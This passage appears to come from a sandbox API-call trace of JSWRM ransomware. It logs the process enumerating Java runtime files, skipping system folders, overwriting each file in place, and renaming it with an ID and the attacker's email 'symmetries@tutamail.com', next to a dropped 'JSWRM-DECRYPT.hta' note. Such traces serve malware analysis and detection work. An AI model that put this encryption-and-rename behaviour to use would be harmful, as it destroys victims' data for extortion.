(HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0069.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.878] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.880] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x204e32fc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x204e32fc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x204e32fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.880] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LINEAR_RGB.pf", cAlternateFileName="LINEAR~1.PF")) returned 1 [0069.880] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2=".") returned 1 [0069.880] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="..") returned 1 [0069.880] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="...") returned 1 [0069.880] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="windows") returned -1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="recovery") returned -1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="perflogs") returned -1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="documents and settings") returned 1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="$RECYCLE.BIN") returned 1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="system volume information") returned -1 [0069.881] lstrcmpiW (lpString1="LINEAR_RGB.pf", lpString2="msocache") returned -1 [0069.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LINEAR_RGB.pf", lpUsedDefaultChar=0x0) returned 13 [0069.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LINEAR_RGB.pf", lpUsedDefaultChar=0x0) returned 13 [0069.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.881] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.882] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1044) returned 1 [0069.882] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x410) returned 0x203550 [0069.882] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x410, lpOverlapped=0x0) returned 1 [0069.883] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.883] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x410, lpOverlapped=0x0) returned 1 [0069.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0069.883] CloseHandle (hObject=0x458) returned 1 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0069.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0069.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.884] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4302a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PYCC.pf", cAlternateFileName="")) returned 1 [0069.884] lstrcmpiW (lpString1="PYCC.pf", lpString2=".") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="..") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="...") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="windows") returned -1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="recovery") returned -1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="perflogs") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="documents and settings") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="$RECYCLE.BIN") returned 1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="system volume information") returned -1 [0069.885] lstrcmpiW (lpString1="PYCC.pf", lpString2="msocache") returned 1 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PYCC.pf", lpUsedDefaultChar=0x0) returned 7 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PYCC.pf", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PYCC.pf", lpUsedDefaultChar=0x0) returned 7 [0069.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.885] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.885] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=274474) returned 1 [0069.885] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.885] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0069.898] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.898] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0069.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.899] CloseHandle (hObject=0x458) returned 1 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0069.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0069.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0069.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.900] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sRGB.pf", cAlternateFileName="")) returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2=".") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="..") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="...") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="windows") returned -1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="recovery") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="perflogs") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="documents and settings") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="$RECYCLE.BIN") returned 1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="system volume information") returned -1 [0069.900] lstrcmpiW (lpString1="sRGB.pf", lpString2="msocache") returned 1 [0069.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sRGB.pf", lpUsedDefaultChar=0x0) returned 7 [0069.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sRGB.pf", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sRGB.pf", lpUsedDefaultChar=0x0) returned 7 [0069.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.901] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.901] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3144) returned 1 [0069.901] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x24e1e0 [0069.901] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0069.907] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.907] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.908] CloseHandle (hObject=0x458) returned 1 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 